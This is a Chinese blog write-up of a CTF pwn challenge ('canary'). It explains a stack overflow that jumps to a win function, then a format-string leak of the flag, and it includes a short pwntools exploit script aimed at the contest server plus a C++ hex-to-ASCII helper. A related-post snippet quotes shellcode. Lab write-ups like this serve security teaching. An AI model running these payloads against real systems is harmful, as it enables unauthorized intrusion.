ROIS冬令营———canary

已于 2023-02-19 09:50:35 修改
阅读量88 收藏
点赞数
分类专栏: pwn 文章标签: 安全
于 2023-02-19 00:32:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129106476
版权

题目自取

链接:https://pan.baidu.com/s/1m8PK-A-7Oaqduxk7Pxucnw?pwd=cdf5 
提取码:cdf5

开始:

首先放到IDA查看基本情况

有个很明显的栈溢出漏洞,再去看看程序的具体保护情况

 基本情况就是32位程序,开了canary保护,nx保护(不能写入shellcode),然后没开pie
我第一时间想到的就是去泄露canary,然后完成rop得到shell
不过这里有一个特别让我疑惑的点,就是保护措施明明打开了canary保护,但是我反汇编出来的vuln函数居然没有canary的检查,就直接ret返回了

好吧,既然没有那岂不是更容易了,于是我就准备system+/bin/sh了
但是gdb里发现居然没有system的plt表的地址,然后一看原来是静态编译,那没事了
静态编译就更好办了,直接ROPgadget开起来,构造如下图即可(这当然是一种方法)
   
不过很不走运,在IDA里,并没有找到/bin/sh字符串,这希望也破灭了。

不过再仔细看看有个win函数。我们打开看看

这分明就是一个后门函数啊。
基本逻辑就是v4读入flag,再把v4的内容读65个字节给v3(应该就是把flag给v3),然后让用户手动输入v2,然后重点来了,很明显的格式化字符串漏洞‘printf(v2,v1)’,而v2正是我们可以操控的。于是结合前面的vuln栈溢出漏洞,我们可以覆盖返回地址为win函数的地址,从而完成跳转到win函数,因为v3是在栈上,且读入了flag,那么我们的思路就是通过格式化字符串漏洞去泄露出flag
 

这里我们反汇编一下win函数

 如果只是单纯根据IDA给的栈位置v3位置位于esp+0x1b的话,其实是错的,可以很明显看到esp实际上一直在变动,所以通过综合判断,应该开始于第是十个参数,那接下来就是泄露啦,过程有点繁琐,就是不停地给v2读入%k$p获得对应的字符串

exp如下

from pwn import *
elf = ELF('./canary')
io =remote("81.68.85.214",8007)

context(os="linux", arch="i386",log_level="debug") 
from LibcSearcher import *

io.recv()
payload=b'a'*28+p32(elf.symbols['win'])
io.sendline(payload)

payload=b'%10$p%11$p'
io.sendline(payload)

io.recv()
io.interactive()

 其中给v2的payload要重复好多次才能完全把flag泄露
 

这里上传我写的c++代码,用于转换地址为对应阿斯克码字母的
 


#include <iostream>
#include <cstdio>
#include <cmath>
#include <cstring>
#include <sstream>
using namespace std;
long long str_int(string str);
int weishu(long long num);
void shuchu(int ws, long long num);
int main()
{
	string str;
	cin >> str;
	long long num;
	num= str_int(str);
	printf("%x\n", num);
	printf("%d\n", weishu(num));
	shuchu(weishu(num), num);
	return 0;

}

int weishu(long long num)
{
	int ws = 0;
	for (int i = 0; num > 0; i++)
	{
		num = num / 16;
		ws++;
	}
	return ws;
}

long long str_int(string str)
{
	long long num = 0;
	long long len;
	len = str.length();
	for (int i = 2; i < len; i++) {
		if (str[i] >= '0' && str[i] <= '9')
			num = num * 16 + str[i] - '0';
		else if (str[i] >= 'A' && str[i] <= 'F')
			num = num * 16 + str[i] - 'A' + 10;
		else if (str[i] >= 'a' && str[i] <= 'f')
			num = num * 16 + str[i] - 'a' + 10;
	}
	return num;
}

void shuchu(int ws, long long num)
{
	std::stringstream char_stream;
	for (int i = 0; i < 8; i++) {
		char_stream << char((num >> (8 * i)) & 0xff);
	}
	std::string char_string = char_stream.str();

	// Print the result
	std::cout << "The string representation of the hexadecimal number is: " << char_string << std::endl;

}


转换为字符的十六进制数的八位构成。最终,我们可以使用该字符串,例如打印或在程序中使用该字符串。

把每一次泄露出来的地址都放到里面跑一下,就拿到flag啦!

cccsl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Python,OpenCV制作图像Mask——截取ROIs及构建透明的叠加层
qq_40985985的博客
07-04 3196
这篇博客将介绍如何使用OpenCV制作Mask图像掩码。使用位运算和图像掩码让我们只关注图像中感兴趣的部分。截取出任意区域的ROIs
PyTorch深度学习实战(19)——从零开始实现R-CNN目标检测
盼小辉丶的博客
10-07 2675
R-CNN (Region-based Convolutional Neural Network) 是 R-CNN 系列目标检测算法的初代模型,其将“深度学习”和传统的“计算机视觉”的相结合,在深度学习的框架下实现了高效的物体检测和识别。R-CNN 的核心思想是将目标检测任务分解为候选区域提取、特征提取、目标分类和边界框回归四个步骤。R-CNN 中的 “Region-based” 指的就是区域提议(候选区域),用于在图像中识别对象。在本节中,我们将利用区域提议来完成图像中目标对象的检测和定位。
ROIS冬令营——format4
fzucaicai的博客
02-22 93
我们可以观察到0x7fffffffdec8这块地址指向的是返回地址的下一地址,我们可以泄露这个地址再减去0x8,就可以得到返回地址处的地址,在这里也就是0x7fffffffdda8。这里要说明的是返回地址的时候返回的是base+0x951,是0x951而不是0x950,应该是栈对齐的原因,如果用ROPgadget拿到ret的地址,在返回后门函数前加一个ret应该也能够解决问题。大致思路是修改返回地址为后门函数,也就是 把rbp的下一个地址(main+46)处修改为backdoor的地址。
ROIS冬令营——typop
fzucaicai的博客
02-20 81
正是输出读入的buf变量,而且用的是%s输出,而%s的特点正是一直输出,直到遇到/x00/x00,而canary的值的特点正是最后两个字节为00,而又因为小端序,所以00对应的/x00/x00就被提到了最高位,会造成输出截断,因此我们可以选择输入11个b'a',刚好覆盖掉/x00/x00,这样就可以输出canary了,但是因为不遇到/x00/x00不会停止,所以也会把rbp的地址所指向的值也一并输出,不过问题不大。事实证明我们的 代码是正确的,那么得到了canary的地址,接下来就是libc的基地址了。
ROIS冬令营——database_in
fzucaicai的博客
02-21 99
shellcode:"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"(菜得要死,直接网上找,不要学我)拿到canary和rbp后,就可以通过栈溢出执行shellcode啦,但是我们注意到,由于shellcode太长,栈溢出太短,因此我们可以把shellcode放在栈中,在溢出的返回地址处写入返回到shellcode的地方。个人习惯先checksec再IDA。
ROIS冬令营——database
fzucaicai的博客
02-20 72
函数的意思是从标准输入中读入最多32个字节的数据,从标准输入读取一个字节,如果小于等于 0 则说明读取失败,返回 -1(0xFFFFFFFF).如果读取到换行符 ,将换行符替换为字符串0,则返回-1,就会停止。' 意思就是分两次执行,如输入 echo hello world && cat flag,它的意思就是执行system('echo hello world') system('cat flag')变量中的字符串作为参数,将它们合并成一个新的字符串,最后将结果存储到。
ROIS冬令营——format3(把bss段数据移至栈上)
fzucaicai的博客
02-19 66
漏洞是非常明显的,有格式化字符串漏洞,就是要改key的值为2023,但是发现key的值不在栈上,因此我们不能直接用输入%n来修改栈上的数据,而是要把key这个数据的地址放到栈中,然后进行修改。可以看到key变量在bss区,地址是0x60208c。那么我们的思路就是把bss段key的地址移至栈上,然后修改key的值。链接:https://pan.baidu.com/s/10SyKe0s9cyY6kiblH2fs8Q?先往第八个参数写入数据2023(因为我们将把key的地址放在第8个参数,rsp是第6个参数)
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1172
2021年暑假参加集训,在buuctf上做的几道题的writeup.
cuda——nms
xiaohu的博客
08-07 760
cuda——nms
软路由rois
07-27
安装于破解方法:2个ISO分别刻盘(虚拟机无视该步骤), 先安装官方原版mikrotik-5.24.iso, 再用破解光盘启动HunterTik-v2.3.1.iso, 一路回车,搞定。。。... (如果以前是安装过HunterTik-v2.3.1.iso破解的(5.22-...
Measure_ROIs:ImageJ宏
05-08
设置了“测量投资回报率”宏 •这组宏用于定义图像上的关注区域并测量其特征(区域,强度...)。 工作流程分为两部分。 它允许您通过三种不同的方法为给定通道上的所有图像生成感兴趣的特征的归类ROI。...
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
02-21
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
roisin-spring:用于分析临床数据的 Roisin Web 应用程序
06-05
服务器部署完成 roisin-settings.properties 文件将上述文件复制到 CATALINA_HOME
ENVI遥感图像处理实验二——图像常规处理2.docx
04-04
此外,可以利用Overlay选项中的Region of Interest和Basic Tools下的Subset data via ROIs功能,或者在New Display中查看裁剪结果。 接下来是图像镶嵌,这是将多张覆盖相邻地区的图像拼接成一个完整图像的过程。...
加密与安全_三种方式实现基于国密非对称加密算法的加解密和签名验签
最新发布
小工匠
06-30 1006
无需秘钥,“加密”后的数据不可逆。所以这也不算是“加密”,一般称为哈希(Hash)。任何长度的数据生成的哈希值长度都固定。相同数据每次生成的哈希值相同,不同的数据则不同。数据摘要/哈希,验证数据是否被篡改、或数据丢失,保障数据的完整性、不可篡改性。单向加密保存数据,如密码的保存,密码的存储普遍都是存的哈希值,登录时比较其hash值即可。
港口危险货物安全管理人员考试题库(含答案)
m0_66937659的博客
06-28 359
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
WEB攻防【5】——JS项目/Node.js框架安全/识别审计/验证绕过
weixin_42090431的博客
06-27 348
JS开发的WEB应用和PHP、java.NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。网站检查网络下面加载了哪些js文件、以及js文件里面有没有嵌套别的js文件。一般有/static/js/app.j8 等顺序的js文件。2、开发框架-Vulhub-Node.JS安全。3、真实应用-APP应用直接重置密码。4、真实应用-违法彩彩文件上传安全。1、原生JS&开发框架-安全条件。4、如何获取更多的Js文件?2、流行的Js框架有那些?3、如何判定Js开发应用?5、如何快速获取价值代码?
韩国锂电池工厂火灾:行业安全警钟再次敲响
iotsensor的博客
06-27 344
这些传感器可以实时监测锂电池的温度、压力、气体浓度等参数,一旦发现异常情况,可以立即发出警报并采取相应措施,从而有效避免火灾事故的发生。同时,也需要加大研发力度,推动锂电池安全技术的不断进步和创新,以确保锂电池的安全可靠使用。等传感器监测防护区内CO气体浓度、氢气浓度、VOC浓度、可燃气体浓度和电池表面温度的变化,智能判断锂电池是否发生热失控,提前预警,有效避免火灾事故的发生。随着新能源汽车和储能领域的快速发展,锂电池的应用规模不断扩大,但与此同时,其潜在的安全风险也在不断提升。、氢气(H2)传感器。
subset data from rois
09-18
Subset data from rois是指从感兴趣区域(ROIs)中获取子集数据。ROIs是指在数据集中定义的特定区域,可能是在图像、地图、生物学等领域中使用的感兴趣区域。 获取ROIs的子集数据通常涉及以下步骤: 首先,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值